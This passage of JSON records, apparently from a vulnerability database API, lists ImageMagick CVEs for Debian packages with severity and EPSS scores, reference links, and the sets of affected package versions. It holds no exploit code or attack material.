"vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-13308" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "7.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-snup-2hn7-sue2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/78313?format=api", "vulnerability_id": "VCID-swqu-wape-83bj", "summary": "ImageMagick: heap-buffer-overflow in coders/tiff.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-3428.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-3428.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-3428", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05906", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05689", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05754", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05717", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05872", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05731", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05726", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05766", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05792", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05767", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05759", "published_at": "2026-04-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-3428" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3610", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3610" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1115", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1115" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1289", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1289" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1906", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1906" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34151", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34151" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3428", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3428" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5341", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5341" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2218369", "reference_id": "2218369", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-09T15:44:06Z/" } ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2218369" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/o:redhat:enterprise_linux:6", "reference_id": "cpe:/o:redhat:enterprise_linux:6", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/o:redhat:enterprise_linux:6" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/o:redhat:enterprise_linux:7", "reference_id": "cpe:/o:redhat:enterprise_linux:7", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/o:redhat:enterprise_linux:7" }, { "reference_url": "https://access.redhat.com/security/cve/CVE-2023-3428", "reference_id": "CVE-2023-3428", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-09T15:44:06Z/" } ], "url": "https://access.redhat.com/security/cve/CVE-2023-3428" }, { "reference_url": "https://usn.ubuntu.com/6200-1/", "reference_id": "USN-6200-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6200-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2023-3428" ], "risk_score": 2.8, "exploitability": "0.5", "weighted_severity": "5.6", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-swqu-wape-83bj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80563?format=api", "vulnerability_id": "VCID-sy2v-5ufy-sfc4", "summary": "ImageMagick: Integer overflow in WriteTHUMBNAILImage of coders/thumbnail.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-20312.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-20312.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-20312", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0017", "scoring_system": "epss", "scoring_elements": "0.38163", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.0017", "scoring_system": "epss", "scoring_elements": "0.38299", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.0017", "scoring_system": "epss", "scoring_elements": "0.38322", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.0017", "scoring_system": "epss", "scoring_elements": "0.38192", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.0017", "scoring_system": "epss", "scoring_elements": "0.38241", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.0017", "scoring_system": "epss", "scoring_elements": "0.3825", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.0017", "scoring_system": "epss", "scoring_elements": "0.38268", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.0017", "scoring_system": "epss", "scoring_elements": "0.38233", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.0017", "scoring_system": "epss", "scoring_elements": "0.38209", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.0017", "scoring_system": "epss", "scoring_elements": "0.38256", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.0017", "scoring_system": "epss", "scoring_elements": "0.38236", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.0017", "scoring_system": "epss", "scoring_elements": "0.38168", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.0017", "scoring_system": "epss", "scoring_elements": "0.38004", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-20312" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20312", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20312" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1013282", "reference_id": "1013282", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1013282" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1946742", "reference_id": "1946742", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1946742" }, { "reference_url": "https://usn.ubuntu.com/5158-1/", "reference_id": "USN-5158-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5158-1/" }, { "reference_url": "https://usn.ubuntu.com/5736-1/", "reference_id": "USN-5736-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5736-1/" }, { "reference_url": "https://usn.ubuntu.com/6200-1/", "reference_id": "USN-6200-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6200-1/" }, { "reference_url": "https://usn.ubuntu.com/USN-5736-2/", "reference_id": "USN-USN-5736-2", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/USN-5736-2/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2021-20312" ], "risk_score": 2.4, "exploitability": "0.5", "weighted_severity": "4.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-sy2v-5ufy-sfc4" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81916?format=api", "vulnerability_id": "VCID-t2pe-etah-1bh3", "summary": "ImageMagick: memory leaks in AcquireMagickMemory function", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27753.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27753.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27753", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00079", "scoring_system": "epss", "scoring_elements": "0.23292", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00079", "scoring_system": "epss", "scoring_elements": "0.23465", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00079", "scoring_system": "epss", "scoring_elements": "0.23502", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00079", "scoring_system": "epss", "scoring_elements": "0.23286", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00079", "scoring_system": "epss", "scoring_elements": "0.23359", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00079", "scoring_system": "epss", "scoring_elements": "0.2341", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00079", "scoring_system": "epss", "scoring_elements": "0.23429", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00079", "scoring_system": 